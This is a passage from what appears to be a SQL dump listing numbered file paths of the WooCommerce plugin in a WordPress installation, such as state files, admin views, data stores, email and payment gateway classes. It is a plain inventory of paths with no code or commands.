G.php'),(4049,'wp-content/plugins/woocommerce/i18n/states/BO.php'),(4050,'wp-content/plugins/woocommerce/i18n/states/BR.php'),(4051,'wp-content/plugins/woocommerce/i18n/states/CA.php'),(4052,'wp-content/plugins/woocommerce/i18n/states/CH.php'),(4053,'wp-content/plugins/woocommerce/i18n/states/CN.php'),(4054,'wp-content/plugins/woocommerce/i18n/states/ES.php'),(4055,'wp-content/plugins/woocommerce/i18n/states/GR.php'),(4056,'wp-content/plugins/woocommerce/i18n/states/HK.php'),(4057,'wp-content/plugins/woocommerce/i18n/states/HU.php'),(4058,'wp-content/plugins/woocommerce/i18n/states/ID.php'),(4059,'wp-content/plugins/woocommerce/i18n/states/IE.php'),(4060,'wp-content/plugins/woocommerce/i18n/states/IN.php'),(4061,'wp-content/plugins/woocommerce/i18n/states/IR.php'),(4062,'wp-content/plugins/woocommerce/i18n/states/IT.php'),(4063,'wp-content/plugins/woocommerce/i18n/states/JP.php'),(4064,'wp-content/plugins/woocommerce/i18n/states/LR.php'),(4065,'wp-content/plugins/woocommerce/i18n/states/MD.php'),(4066,'wp-content/plugins/woocommerce/i18n/states/MX.php'),(4067,'wp-content/plugins/woocommerce/i18n/states/MY.php'),(4068,'wp-content/plugins/woocommerce/i18n/states/NG.php'),(4069,'wp-content/plugins/woocommerce/i18n/states/NP.php'),(4070,'wp-content/plugins/woocommerce/i18n/states/NZ.php'),(4071,'wp-content/plugins/woocommerce/i18n/states/PE.php'),(4072,'wp-content/plugins/woocommerce/i18n/states/PH.php'),(4073,'wp-content/plugins/woocommerce/i18n/states/PK.php'),(4074,'wp-content/plugins/woocommerce/i18n/states/PY.php'),(4075,'wp-content/plugins/woocommerce/i18n/states/RO.php'),(4076,'wp-content/plugins/woocommerce/i18n/states/TH.php'),(4077,'wp-content/plugins/woocommerce/i18n/states/TR.php'),(4078,'wp-content/plugins/woocommerce/i18n/states/TZ.php'),(4079,'wp-content/plugins/woocommerce/i18n/states/UG.php'),(4080,'wp-content/plugins/woocommerce/i18n/states/UM.php'),(4081,'wp-content/plugins/woocommerce/i18n/states/US.php'),(4082,'wp-content/plugins/woocommerce/i18n/states/ZA.php'),(4083,'wp-content/plugins/woocommerce/i18n/states.php'),(4084,'wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-data.php'),(4085,'wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-deprecated-hooks.php'),(4086,'wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-integration.php'),(4087,'wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-log-handler.php'),(4088,'wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-object-query.php'),(4089,'wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-order.php'),(4090,'wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-payment-gateway.php'),(4091,'wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-payment-token.php'),(4092,'wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-privacy.php'),(4093,'wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-product.php'),(4094,'wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-session.php'),(4095,'wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-settings-api.php'),(4096,'wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-shipping-method.php'),(4097,'wp-content/plugins/woocommerce/includes/abstracts/abstract-wc-widget.php'),(4098,'wp-content/plugins/woocommerce/includes/abstracts/class-wc-background-process.php'),(4099,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-addons.php'),(4100,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-api-keys-table-list.php'),(4101,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-api-keys.php'),(4102,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-assets.php'),(4103,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-attributes.php'),(4104,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-customize.php'),(4105,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-dashboard.php'),(4106,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-duplicate-product.php'),(4107,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-exporters.php'),(4108,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-help.php'),(4109,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-importers.php'),(4110,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-log-table-list.php'),(4111,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-menus.php'),(4112,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-meta-boxes.php'),(4113,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-notices.php'),(4114,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-permalink-settings.php'),(4115,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-pointers.php'),(4116,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-post-types.php'),(4117,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-profile.php'),(4118,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-reports.php'),(4119,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-settings.php'),(4120,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-setup-wizard.php'),(4121,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-status.php'),(4122,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-taxonomies.php'),(4123,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-webhooks-table-list.php'),(4124,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin-webhooks.php'),(4125,'wp-content/plugins/woocommerce/includes/admin/class-wc-admin.php'),(4126,'wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-api.php'),(4127,'wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-compat.php'),(4128,'wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-options.php'),(4129,'wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-plugin-info.php'),(4130,'wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper-updater.php'),(4131,'wp-content/plugins/woocommerce/includes/admin/helper/class-wc-helper.php'),(4132,'wp-content/plugins/woocommerce/includes/admin/helper/views/html-helper-compat.php'),(4133,'wp-content/plugins/woocommerce/includes/admin/helper/views/html-main.php'),(4134,'wp-content/plugins/woocommerce/includes/admin/helper/views/html-oauth-start.php'),(4135,'wp-content/plugins/woocommerce/includes/admin/helper/views/html-section-account.php'),(4136,'wp-content/plugins/woocommerce/includes/admin/helper/views/html-section-nav.php'),(4137,'wp-content/plugins/woocommerce/includes/admin/helper/views/html-section-notices.php'),(4138,'wp-content/plugins/woocommerce/includes/admin/importers/class-wc-product-csv-importer-controller.php'),(4139,'wp-content/plugins/woocommerce/includes/admin/importers/class-wc-tax-rate-importer.php'),(4140,'wp-content/plugins/woocommerce/includes/admin/importers/mappings/default.php'),(4141,'wp-content/plugins/woocommerce/includes/admin/importers/mappings/generic.php'),(4142,'wp-content/plugins/woocommerce/includes/admin/importers/mappings/mappings.php'),(4143,'wp-content/plugins/woocommerce/includes/admin/importers/mappings/shopify.php'),(4144,'wp-content/plugins/woocommerce/includes/admin/importers/mappings/wordpress.php'),(4145,'wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-done.php'),(4146,'wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-footer.php'),(4147,'wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-header.php'),(4148,'wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-mapping.php'),(4149,'wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-progress.php'),(4150,'wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-steps.php'),(4151,'wp-content/plugins/woocommerce/includes/admin/importers/views/html-product-csv-import-form.php'),(4152,'wp-content/plugins/woocommerce/includes/admin/list-tables/abstract-class-wc-admin-list-table.php'),(4153,'wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-coupons.php'),(4154,'wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-orders.php'),(4155,'wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-products.php'),(4156,'wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/class-wc-marketplace-suggestions.php'),(4157,'wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/class-wc-marketplace-updater.php'),(4158,'wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/templates/html-product-data-extensions.php'),(4159,'wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/views/container.php'),(4160,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-coupon-data.php'),(4161,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-actions.php'),(4162,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-data.php'),(4163,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-downloads.php'),(4164,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-items.php'),(4165,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-notes.php'),(4166,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-data.php'),(4167,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php'),(4168,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-reviews.php'),(4169,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-short-description.php'),(4170,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-download-permission.php'),(4171,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-fee.php'),(4172,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-item-meta.php'),(4173,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-item.php'),(4174,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-items.php'),(4175,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-notes.php'),(4176,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-refund.php'),(4177,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-shipping.php'),(4178,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-attribute.php'),(4179,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-advanced.php'),(4180,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-attributes.php'),(4181,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-general.php'),(4182,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-inventory.php'),(4183,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-linked-products.php'),(4184,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-panel.php'),(4185,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-shipping.php'),(4186,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-variations.php'),(4187,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-download.php'),(4188,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-variation-download.php'),(4189,'wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-variation-admin.php'),(4190,'wp-content/plugins/woocommerce/includes/admin/plugin-updates/class-wc-plugin-updates.php'),(4191,'wp-content/plugins/woocommerce/includes/admin/plugin-updates/class-wc-plugins-screen-updates.php'),(4192,'wp-content/plugins/woocommerce/includes/admin/plugin-updates/class-wc-updates-screen-updates.php'),(4193,'wp-content/plugins/woocommerce/includes/admin/plugin-updates/views/html-notice-untested-extensions-inline.php'),(4194,'wp-content/plugins/woocommerce/includes/admin/plugin-updates/views/html-notice-untested-extensions-modal.php'),(4195,'wp-content/plugins/woocommerce/includes/admin/reports/class-wc-admin-report.php'),(4196,'wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-coupon-usage.php'),(4197,'wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-customer-list.php'),(4198,'wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-customers.php'),(4199,'wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-downloads.php'),(4200,'wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-low-in-stock.php'),(4201,'wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-most-stocked.php'),(4202,'wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-out-of-stock.php'),(4203,'wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-sales-by-category.php'),(4204,'wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-sales-by-date.php'),(4205,'wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-sales-by-product.php'),(4206,'wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-stock.php'),(4207,'wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-taxes-by-code.php'),(4208,'wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-taxes-by-date.php'),(4209,'wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-accounts.php'),(4210,'wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-advanced.php'),(4211,'wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-checkout.php'),(4212,'wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-emails.php'),(4213,'wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-general.php'),(4214,'wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-integrations.php'),(4215,'wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-page.php'),(4216,'wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-payment-gateways.php'),(4217,'wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-products.php'),(4218,'wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-shipping.php'),(4219,'wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-tax.php'),(4220,'wp-content/plugins/woocommerce/includes/admin/settings/views/class-wc-settings-rest-api.php'),(4221,'wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-classes.php'),(4222,'wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-zone-methods.php'),(4223,'wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-zones-instance.php'),(4224,'wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-zones.php'),(4225,'wp-content/plugins/woocommerce/includes/admin/settings/views/html-keys-edit.php'),(4226,'wp-content/plugins/woocommerce/includes/admin/settings/views/html-settings-tax.php'),(4227,'wp-content/plugins/woocommerce/includes/admin/settings/views/html-webhooks-edit.php'),(4228,'wp-content/plugins/woocommerce/includes/admin/settings/views/settings-tax.php'),(4229,'wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-addons.php'),(4230,'wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-product-export.php'),(4231,'wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-reports.php'),(4232,'wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-logs-db.php'),(4233,'wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-logs.php'),(4234,'wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-report.php'),(4235,'wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-tools.php'),(4236,'wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status.php'),(4237,'wp-content/plugins/woocommerce/includes/admin/views/html-admin-settings.php'),(4238,'wp-content/plugins/woocommerce/includes/admin/views/html-bulk-edit-product.php'),(4239,'wp-content/plugins/woocommerce/includes/admin/views/html-email-template-preview.php'),(4240,'wp-content/plugins/woocommerce/includes/admin/views/html-notice-custom.php'),(4241,'wp-content/plugins/woocommerce/includes/admin/views/html-notice-install.php'),(4242,'wp-content/plugins/woocommerce/includes/admin/views/html-notice-legacy-shipping.php'),(4243,'wp-content/plugins/woocommerce/includes/admin/views/html-notice-no-shipping-methods.php'),(4244,'wp-content/plugins/woocommerce/includes/admin/views/html-notice-regenerating-lookup-table.php'),(4245,'wp-content/plugins/woocommerce/includes/admin/views/html-notice-regenerating-thumbnails.php'),(4246,'wp-content/plugins/woocommerce/includes/admin/views/html-notice-secure-connection.php'),(4247,'wp-content/plugins/woocommerce/includes/admin/views/html-notice-template-check.php'),(4248,'wp-content/plugins/woocommerce/includes/admin/views/html-notice-update.php'),(4249,'wp-content/plugins/woocommerce/includes/admin/views/html-notice-updated.php'),(4250,'wp-content/plugins/woocommerce/includes/admin/views/html-notice-updating.php'),(4251,'wp-content/plugins/woocommerce/includes/admin/views/html-notice-wc-admin.php'),(4252,'wp-content/plugins/woocommerce/includes/admin/views/html-notice-wp-php-minimum-requirements.php'),(4253,'wp-content/plugins/woocommerce/includes/admin/views/html-quick-edit-product.php'),(4254,'wp-content/plugins/woocommerce/includes/admin/views/html-report-by-date.php'),(4255,'wp-content/plugins/woocommerce/includes/admin/wc-admin-functions.php'),(4256,'wp-content/plugins/woocommerce/includes/admin/wc-meta-box-functions.php'),(4257,'wp-content/plugins/woocommerce/includes/class-wc-ajax.php'),(4258,'wp-content/plugins/woocommerce/includes/class-wc-api.php'),(4259,'wp-content/plugins/woocommerce/includes/class-wc-auth.php'),(4260,'wp-content/plugins/woocommerce/includes/class-wc-autoloader.php'),(4261,'wp-content/plugins/woocommerce/includes/class-wc-background-emailer.php'),(4262,'wp-content/plugins/woocommerce/includes/class-wc-background-updater.php'),(4263,'wp-content/plugins/woocommerce/includes/class-wc-breadcrumb.php'),(4264,'wp-content/plugins/woocommerce/includes/class-wc-cache-helper.php'),(4265,'wp-content/plugins/woocommerce/includes/class-wc-cart-fees.php'),(4266,'wp-content/plugins/woocommerce/includes/class-wc-cart-session.php'),(4267,'wp-content/plugins/woocommerce/includes/class-wc-cart-totals.php'),(4268,'wp-content/plugins/woocommerce/includes/class-wc-cart.php'),(4269,'wp-content/plugins/woocommerce/includes/class-wc-checkout.php'),(4270,'wp-content/plugins/woocommerce/includes/class-wc-cli.php'),(4271,'wp-content/plugins/woocommerce/includes/class-wc-comments.php'),(4272,'wp-content/plugins/woocommerce/includes/class-wc-countries.php'),(4273,'wp-content/plugins/woocommerce/includes/class-wc-coupon.php'),(4274,'wp-content/plugins/woocommerce/includes/class-wc-customer-download-log.php'),(4275,'wp-content/plugins/woocommerce/includes/class-wc-customer-download.php'),(4276,'wp-content/plugins/woocommerce/includes/class-wc-customer.php'),(4277,'wp-content/plugins/woocommerce/includes/class-wc-data-exception.php'),(4278,'wp-content/plugins/woocommerce/includes/class-wc-data-store.php'),(4279,'wp-content/plugins/woocommerce/includes/class-wc-datetime.php'),(4280,'wp-content/plugins/woocommerce/includes/class-wc-deprecated-action-hooks.php'),(4281,'wp-content/plugins/woocommerce/includes/class-wc-deprecated-filter-hooks.php'),(4282,'wp-content/plugins/woocommerce/includes/class-wc-discounts.php'),(4283,'wp-content/plugins/woocommerce/includes/class-wc-download-handler.php'),(4284,'wp-content/plugins/woocommerce/includes/class-wc-emails.php'),(4285,'wp-content/plugins/woocommerce/includes/class-wc-embed.php'),(4286,'wp-content/plugins/woocommerce/includes/class-wc-form-handler.php'),(4287,'wp-content/plugins/woocommerce/includes/class-wc-frontend-scripts.php'),(4288,'wp-content/plugins/woocommerce/includes/class-wc-geo-ip.php'),(4289,'wp-content/plugins/woocommerce/includes/class-wc-geolite-integration.php'),(4290,'wp-content/plugins/woocommerce/includes/class-wc-geolocation.php'),(4291,'wp-content/plugins/woocommerce/includes/class-wc-https.php'),(4292,'wp-content/plugins/woocommerce/includes/class-wc-install.php'),(4293,'wp-content/plugins/woocommerce/includes/class-wc-integrations.php'),(4294,'wp-content/plugins/woocommerce/includes/class-wc-log-levels.php'),(4295,'wp-content/plugins/woocommerce/includes/class-wc-logger.php'),(4296,'wp-content/plugins/woocommerce/includes/class-wc-meta-data.php'),(4297,'wp-content/plugins/woocommerce/includes/class-wc-order-factory.php'),(4298,'wp-content/plugins/woocommerce/includes/class-wc-order-item-coupon.php'),(4299,'wp-content/plugins/woocommerce/includes/class-wc-order-item-fee.php'),(4300,'wp-content/plugins/woocommerce/includes/class-wc-order-item-meta.php'),(4301,'wp-content/plugins/woocommerce/includes/class-wc-order-item-product.php'),(4302,'wp-content/plugins/woocommerce/includes/class-wc-order-item-shipping.php'),(4303,'wp-content/plugins/woocommerce/includes/class-wc-order-item-tax.php'),(4304,'wp-content/plugins/woocommerce/includes/class-wc-order-item.php'),(4305,'wp-content/plugins/woocommerce/includes/class-wc-order-query.php'),(4306,'wp-content/plugins/woocommerce/includes/class-wc-order-refund.php'),(4307,'wp-content/plugins/woocommerce/includes/class-wc-order.php'),(4308,'wp-content/plugins/woocommerce/includes/class-wc-payment-gateways.php'),(4309,'wp-content/plugins/woocommerce/includes/class-wc-payment-tokens.php'),(4310,'wp-content/plugins/woocommerce/includes/class-wc-post-data.php'),(4311,'wp-content/plugins/woocommerce/includes/class-wc-post-types.php'),(4312,'wp-content/plugins/woocommerce/includes/class-wc-privacy-background-process.php'),(4313,'wp-content/plugins/woocommerce/includes/class-wc-privacy-erasers.php'),(4314,'wp-content/plugins/woocommerce/includes/class-wc-privacy-exporters.php'),(4315,'wp-content/plugins/woocommerce/includes/class-wc-privacy.php'),(4316,'wp-content/plugins/woocommerce/includes/class-wc-product-attribute.php'),(4317,'wp-content/plugins/woocommerce/includes/class-wc-product-download.php'),(4318,'wp-content/plugins/woocommerce/includes/class-wc-product-external.php'),(4319,'wp-content/plugins/woocommerce/includes/class-wc-product-factory.php'),(4320,'wp-content/plugins/woocommerce/includes/class-wc-product-grouped.php'),(4321,'wp-content/plugins/woocommerce/includes/class-wc-product-query.php'),(4322,'wp-content/plugins/woocommerce/includes/class-wc-product-simple.php'),(4323,'wp-content/plugins/woocommerce/includes/class-wc-product-variable.php'),(4324,'wp-content/plugins/woocommerce/includes/class-wc-product-variation.php'),(4325,'wp-content/plugins/woocommerce/includes/class-wc-query.php'),(4326,'wp-content/plugins/woocommerce/includes/class-wc-regenerate-images-request.php'),(4327,'wp-content/plugins/woocommerce/includes/class-wc-regenerate-images.php'),(4328,'wp-content/plugins/woocommerce/includes/class-wc-register-wp-admin-settings.php'),(4329,'wp-content/plugins/woocommerce/includes/class-wc-rest-authentication.php'),(4330,'wp-content/plugins/woocommerce/includes/class-wc-rest-exception.php'),(4331,'wp-content/plugins/woocommerce/includes/class-wc-session-handler.php'),(4332,'wp-content/plugins/woocommerce/includes/class-wc-shipping-rate.php'),(4333,'wp-content/plugins/woocommerce/includes/class-wc-shipping-zone.php'),(4334,'wp-content/plugins/woocommerce/includes/class-wc-shipping-zones.php'),(4335,'wp-content/plugins/woocommerce/includes/class-wc-shipping.php'),(4336,'wp-content/plugins/woocommerce/includes/class-wc-shortcodes.php'),(4337,'wp-content/plugins/woocommerce/includes/class-wc-structured-data.php'),(4338,'wp-content/plugins/woocommerce/includes/class-wc-tax.php'),(4339,'wp-content/plugins/woocommerce/includes/class-wc-template-loader.php'),(4340,'wp-content/plugins/woocommerce/includes/class-wc-tracker.php'),(4341,'wp-content/plugins/woocommerce/includes/class-wc-validation.php'),(4342,'wp-content/plugins/woocommerce/includes/class-wc-webhook.php'),(4343,'wp-content/plugins/woocommerce/includes/class-woocommerce.php'),(4344,'wp-content/plugins/woocommerce/includes/cli/class-wc-cli-rest-command.php'),(4345,'wp-content/plugins/woocommerce/includes/cli/class-wc-cli-runner.php'),(4346,'wp-content/plugins/woocommerce/includes/cli/class-wc-cli-tool-command.php'),(4347,'wp-content/plugins/woocommerce/includes/cli/class-wc-cli-update-command.php'),(4348,'wp-content/plugins/woocommerce/includes/customizer/class-wc-customizer-control-cropping.php'),(4349,'wp-content/plugins/woocommerce/includes/customizer/class-wc-shop-customizer.php'),(4350,'wp-content/plugins/woocommerce/includes/data-stores/abstract-wc-order-data-store-cpt.php'),(4351,'wp-content/plugins/woocommerce/includes/data-stores/abstract-wc-order-item-type-data-store.php'),(4352,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-coupon-data-store-cpt.php'),(4353,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-customer-data-store-session.php'),(4354,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-customer-data-store.php'),(4355,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-customer-download-data-store.php'),(4356,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-customer-download-log-data-store.php'),(4357,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-data-store-wp.php'),(4358,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-data-store-cpt.php'),(4359,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-coupon-data-store.php'),(4360,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-data-store.php'),(4361,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-fee-data-store.php'),(4362,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-product-data-store.php'),(4363,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-shipping-data-store.php'),(4364,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-item-tax-data-store.php'),(4365,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-order-refund-data-store-cpt.php'),(4366,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-payment-token-data-store.php'),(4367,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-product-data-store-cpt.php'),(4368,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-product-grouped-data-store-cpt.php'),(4369,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-product-variable-data-store-cpt.php'),(4370,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-product-variation-data-store-cpt.php'),(4371,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-shipping-zone-data-store.php'),(4372,'wp-content/plugins/woocommerce/includes/data-stores/class-wc-webhook-data-store.php'),(4373,'wp-content/plugins/woocommerce/includes/emails/class-wc-email-cancelled-order.php'),(4374,'wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-completed-order.php'),(4375,'wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-invoice.php'),(4376,'wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-new-account.php'),(4377,'wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-note.php'),(4378,'wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-on-hold-order.php'),(4379,'wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-processing-order.php'),(4380,'wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-refunded-order.php'),(4381,'wp-content/plugins/woocommerce/includes/emails/class-wc-email-customer-reset-password.php'),(4382,'wp-content/plugins/woocommerce/includes/emails/class-wc-email-failed-order.php'),(4383,'wp-content/plugins/woocommerce/includes/emails/class-wc-email-new-order.php'),(4384,'wp-content/plugins/woocommerce/includes/emails/class-wc-email.php'),(4385,'wp-content/plugins/woocommerce/includes/export/abstract-wc-csv-batch-exporter.php'),(4386,'wp-content/plugins/woocommerce/includes/export/abstract-wc-csv-exporter.php'),(4387,'wp-content/plugins/woocommerce/includes/export/class-wc-product-csv-exporter.php'),(4388,'wp-content/plugins/woocommerce/includes/gateways/bacs/class-wc-gateway-bacs.php'),(4389,'wp-content/plugins/woocommerce/includes/gateways/cheque/class-wc-gateway-cheque.php'),(4390,'wp-content/plugins/woocommerce/includes/gateways/class-wc-payment-gateway-cc.php'),(4391,'wp-content/plugins/woocommerce/includes/gateways/class-wc-payment-gateway-echeck.php'),(4392,'wp-content/plugins/woocommerce/includes/gateways/cod/class-wc-gateway-cod.php'),(4393,'wp-content/plugins/woocommerce/includes/gateways/paypal/assets/js/paypal-admin.js'),(4394,'wp-content/plugins/woocommerce/includes/gateways/paypal/assets/js/paypal-admin.min.js'),(4395,'wp-content/plugins/woocommerce/includes/gateways/paypal/class-wc-gateway-paypal.php'),(4396,'wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-api-handler.php'),(4397,'wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-ipn-handler.php'),(4398,'wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-pdt-handler.php'),(4399,'wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-request.php'),(4400,'wp-content/plugins/woocommerce/includes/gateways/paypal/includes/class-wc-gateway-paypal-response.php'),(4401,'wp-content/plugins/woocommerce/includes/gateways/paypal/includes/settings-paypal.php'),(4402,'wp-content/plugins/woocommerce/includes/import/abstract-wc-product-importer.php'),(4403,'wp-content/plugins/woocommerce/includes/import/class-wc-product-csv-importer.php'),(4404,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-abstract-order-data-store-interface.php'),(4405,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-coupon-data-store-interface.php'),(4406,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-customer-data-store-interface.php'),(4407,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-customer-download-data-store-interface.php'),(4408,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-customer-download-log-data-store-interface.php'),(4409,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-importer-interface.php'),(4410,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-log-handler-interface.php'),(4411,'wp-content/plugins/woocommerce/includes/interfaces/class-wc-logger-interface.ph